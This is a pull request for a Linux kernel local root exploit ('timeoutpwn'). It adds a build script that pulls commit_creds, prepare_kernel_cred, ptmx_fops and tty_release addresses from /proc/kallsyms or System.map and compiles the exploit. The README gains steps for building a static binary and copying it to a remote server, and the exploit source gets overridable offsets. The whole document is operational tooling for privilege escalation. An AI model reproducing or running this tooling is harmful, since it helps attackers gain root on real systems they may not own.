### PR TITLE
Add script to extract addresses

### DIFF
--- a/README
+++ b/README
@@ -31,3 +31,21 @@ Open /dev/ptmx, close it and enjoy.
 Not very beautiful but should be fairly reliable if symbols can be resolved.
 
 Tested on Ubuntu 13.10
+
+Run:
+----
+Retrieve addresses from `/proc/kallsyms` and run the exploit:
+
+    ./build.sh && ./timeoutpwn
+
+If you would like to build the binary for a remote server, try this:
+
+    ssh user@host 'cat /proc/kallsyms' > syms.txt
+    CFLAGS=-static ./build.sh syms.txt
+    scp timeoutpwn user@host:
+    ...
+
+If `ptmx_fops` cannot be found in kallsyms, try extracting it from the vmlinux
+as provided with the headers package (`linux-headers` on Arch Linux):
+
+    nm /lib/modules/$(uname -r)/build/vmlinux > syms.txt

--- a/build.sh
+++ b/build.sh
@@ -1,0 +1,28 @@
+#!/bin/bash
+
+symsfile=${1-/proc/kallsyms}
+
+find_addr() {
+    addr=$(awk -vsym=$1 '$NF == sym { print $1 }' < "$symsfile")
+    if [ -z "$addr" ]; then
+        echo "$1: address not found"
+        exit 1
+    fi
+
+    if [[ $((0x$addr)) == 0 ]]; then
+        echo "Invalid address, try grabbing System.map"
+        exit 1
+    fi
+
+    CFLAGS="$CFLAGS -D${1^^}=0x${addr}LL"
+}
+
+# Note: newer kernels may miss this in /proc/kallsyms, try System.map instead
+find_addr ptmx_fops
+
+find_addr tty_release
+find_addr commit_creds
+find_addr prepare_kernel_cred
+
+set -x
+${CC-cc} timeoutpwn.c -o timeoutpwn $CFLAGS

--- a/timeoutpwn.c
+++ b/timeoutpwn.c
@@ -55,10 +55,12 @@
  * see /boot/System.map* or /proc/kallsyms
  * These are the offsets from ubuntu 3.11.0-12-generic.
  */
+#ifndef PTMX_FOPS
 #define PTMX_FOPS           0xffffffff81fb30c0LL
 #define TTY_RELEASE         0xffffffff8142fec0LL
 #define COMMIT_CREDS        0xffffffff8108ad40LL
 #define PREPARE_KERNEL_CRED 0xffffffff8108b010LL
+#endif
 
 typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
 typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);


### PR DESCRIPTION
Tested on:
- Kubuntu - /boot/System.map-3.11.0-12-generic
- Arch Linux - nm /lib/modules/3.12.7-1-ARCH/build/vmlinux

kallsyms was unusable for the above versions, so I used other sources as you can see.
